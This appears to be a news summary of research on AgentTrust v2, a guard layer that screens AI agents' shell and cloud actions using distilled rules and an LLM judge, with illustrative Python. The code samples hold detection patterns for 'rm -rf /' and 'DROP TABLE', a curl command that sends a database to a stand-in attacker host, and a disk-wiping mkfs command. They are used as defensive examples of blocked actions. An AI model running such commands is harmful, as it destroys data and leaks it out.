Researchers have developed AgentTrust v2, a self-improving trust layer for AI agents that distinguishes between lexical and semantic threats. Its LLM judge reaches 83.6-85.2% accuracy on a semantic-heavy corpus, and an online replay of 45,000 real-world actions recorded zero benign hard-blocks. The work addresses the challenge of securing AI agents that execute shell commands, cloud operations, and arbitrary tool calls.
Lexical and Semantic Threats Require Fundamentally Different Approaches
Chenglin Yang's research introduces a critical distinction between threat types. Lexical threats carry their danger in stable tokens that deterministic rules can decide, such as rm -rf / or DROP TABLE. Semantic threats are intent-dependent: benign and malicious operations share the same surface form, as when a legitimate database query and a data exfiltration attempt look identical.
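The distinction can be illustrated with a minimal sketch. The rule names and regular expressions below are hypothetical examples written for this article, not AgentTrust's actual rule pack. The point is only that a fixed pattern decides the lexical cases and says nothing about a query whose danger depends on intent.

```python
import re

# Hypothetical rule pack: names and patterns are illustrative assumptions,
# not the rules shipped with AgentTrust v2.
LEXICAL_RULES = [
    # "rm -rf /" or "rm -fr /" aimed at the filesystem root itself.
    ("recursive-root-delete", re.compile(r"\brm\s+-(?:rf|fr)\s+/(?:\s|$)")),
    # Any DROP TABLE statement, regardless of letter case.
    ("drop-table", re.compile(r"\bDROP\s+TABLE\b", re.IGNORECASE)),
]


def match_lexical_rule(action: str):
    """Return the name of the first matching rule, or None if no rule applies."""
    for name, pattern in LEXICAL_RULES:
        if pattern.search(action):
            return name
    return None


# Lexical threats: the dangerous token is in the text itself.
print(match_lexical_rule("rm -rf /"))
print(match_lexical_rule("psql -c 'drop table users'"))

# Semantic case: the same query could be a report or an exfiltration step.
# No rule fires, so something other than pattern matching has to decide.
print(match_lexical_rule("SELECT email FROM customers"))
```

A None result here does not mean the action is safe. It means the rules have no opinion, which is the gap the LLM judge is meant to cover.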
A hand-authored cloud rule pack achieved only 48-56% overall accuracy and brought no improvement (0 percentage points) on semantic categories. Data/database threats remained at 29%, observability at 59%, and supply chain at 50%, supporting the argument that rules, by construction, cannot address semantic threats.
AgentTrust v2 Architecture Combines Self-Learning LLM Judge With Distilled Rules
The dual-store architecture features an LLM judge that raises accuracy on a semantic-heavy corpus from the rule pack's 48% to 83.6-85.2%, nearly doubling it, while keeping false-blocks near zero across two model providers. For lexical threats, the system distills a growing set of deterministic rules, so it becomes cheaper over time as more patterns become rule-decidable.
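One way to picture the routing is the sketch below: deterministic rules answer first, and only undecided actions reach the judge. Everything here is an assumption made for illustration. The TrustLayer class, the substring rules, the distill method, and stub_judge (a stand-in for a real LLM call) are hypothetical and are not taken from the paper.

```python
from dataclasses import dataclass
from typing import Callable, Dict


def stub_judge(action: str) -> str:
    """Stand-in for an LLM judge (assumption): flags one obvious upload target."""
    return "block" if "attacker.example" in action else "allow"


@dataclass
class TrustLayer:
    rules: Dict[str, str]          # token -> verdict; substring match is a toy simplification
    judge: Callable[[str], str]    # called only when no rule decides the action
    judge_calls: int = 0
    total: int = 0

    def decide(self, action: str) -> str:
        self.total += 1
        for token, verdict in self.rules.items():
            if token in action:
                return verdict     # rule-decidable: no judge call needed
        self.judge_calls += 1
        return self.judge(action)

    def distill(self, token: str, verdict: str) -> None:
        """Promote a stable pattern to a rule so later matches skip the judge."""
        self.rules[token] = verdict

    @property
    def judge_call_rate(self) -> float:
        return self.judge_calls / self.total if self.total else 0.0


layer = TrustLayer(rules={"rm -rf /": "block"}, judge=stub_judge)
layer.decide("rm -rf /")                                   # decided by a rule
layer.decide("curl https://attacker.example/up -d @db")    # falls through to the judge
layer.distill("mkfs.", "block")
layer.decide("mkfs.ext4 /dev/sda")                         # now decided by a rule
print(layer.judge_calls, layer.total)
```

As rules accumulate, a larger share of actions returns before the judge is called, which is the mechanism by which such a design would get cheaper over time.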
The guarded RAG memory component addresses a failure mode of plain verdict caches, which collapse to 58% accuracy on surface-identical actions. A corroboration guard lifts semantic accuracy by about 13 percentage points, from roughly 70% to 84%, and the memory is fed specifically on semantic threats.
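The article does not spell out how the corroboration guard works, so the following is only a guess at the general idea, under stated assumptions: a remembered verdict is reused only when several stored precedents for the same action and the same context all agree, and otherwise the lookup abstains so the judge can decide. The function name guarded_lookup, the (action, context, verdict) tuple layout, and the min_support threshold are all hypothetical.

```python
from collections import Counter


def guarded_lookup(memory, action, context, min_support=2):
    """Return a remembered verdict only when it is corroborated.

    memory is a list of (action, context, verdict) tuples (assumed layout).
    Returns None when precedent is missing, too thin, or conflicting,
    which signals the caller to defer to the judge.
    """
    votes = Counter(
        verdict
        for stored_action, stored_context, verdict in memory
        if stored_action == action and stored_context == context
    )
    if not votes:
        return None
    top_verdict, count = votes.most_common(1)[0]
    unanimous = count == sum(votes.values())
    if count >= min_support and unanimous:
        return top_verdict
    return None


# The same query text appears with different intent in different contexts.
memory = [
    ("SELECT * FROM customers", "nightly-report", "allow"),
    ("SELECT * FROM customers", "nightly-report", "allow"),
    ("SELECT * FROM customers", "unknown-session", "block"),
]

print(guarded_lookup(memory, "SELECT * FROM customers", "nightly-report"))
print(guarded_lookup(memory, "SELECT * FROM customers", "unknown-session"))
```

A cache keyed on the action text alone would return one verdict for both contexts, which is the surface-identical failure described above. Abstaining on thin or conflicting precedent trades some cache hits for fewer wrong reuses.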
Online Replay Shows Continuous Improvement Across 45,000 Actions
Testing on 45,000 real-world actions demonstrated the system's self-evolution:
- Judge-call rate decreased from 50% to 44% as more decisions became rule-decidable
- Judge-domain accuracy increased from 71% to 80% through learning from decisions
- Zero benign hard-blocks across all 45,000 actions
- System becomes both faster on lexical threats and smarter on semantic threats over time
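The replay metrics listed above can be computed from a decision log along these lines. This is a sketch with an assumed log format: the Record fields and the window_metrics helper are hypothetical, and the sample records in the usage lines are synthetic placeholders, not data from the study.

```python
from dataclasses import dataclass


@dataclass
class Record:
    routed_to: str      # "rule" or "judge" (assumed labels)
    correct: bool       # did the verdict match ground truth?
    benign: bool        # was the action actually benign?
    hard_blocked: bool  # did the layer hard-block it?


def window_metrics(records, window):
    """Summarize consecutive windows of a replay log."""
    summaries = []
    for start in range(0, len(records), window):
        chunk = records[start:start + window]
        judged = [r for r in chunk if r.routed_to == "judge"]
        summaries.append({
            # Share of actions that needed the judge in this window.
            "judge_call_rate": len(judged) / len(chunk),
            # Accuracy restricted to judge-decided actions (None if there were none).
            "judge_accuracy": (
                sum(r.correct for r in judged) / len(judged) if judged else None
            ),
            # Benign actions that were hard-blocked; the study reports zero.
            "benign_hard_blocks": sum(r.benign and r.hard_blocked for r in chunk),
        })
    return summaries


# Synthetic log: two windows of four actions each.
log = [
    Record("judge", True, True, False), Record("judge", False, False, False),
    Record("rule", True, False, True), Record("rule", True, True, False),
    Record("judge", True, False, True), Record("rule", True, True, False),
    Record("rule", True, False, True), Record("rule", True, True, False),
]
for summary in window_metrics(log, window=4):
    print(summary)
```

Comparing early and late windows in this way is what would reveal a falling judge-call rate alongside rising judge-domain accuracy.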
The research presents the architecture as the first formal distinction between lexical and semantic threat classes, with experimental evidence that they require different approaches. The self-improving design learns from deployment, accumulating both distilled rules for lexical patterns and guarded precedent for semantic cases.
Key Takeaways
- AgentTrust v2 formally distinguishes lexical threats (rule-decidable) from semantic threats (intent-dependent) and shows experimentally that they require different approaches
- The LLM judge achieves 83.6-85.2% accuracy on a semantic-heavy corpus, nearly doubling the 48% accuracy of hand-authored rules
- Online replay across 45,000 actions showed judge-call rate falling from 50% to 44% while judge-domain accuracy increased from 71% to 80%
- Zero benign actions were hard-blocked across all 45,000 test actions, maintaining safety without false positives
- The guarded RAG memory lifts semantic accuracy by about 13 percentage points, from roughly 70% to 84%, by using a corroboration guard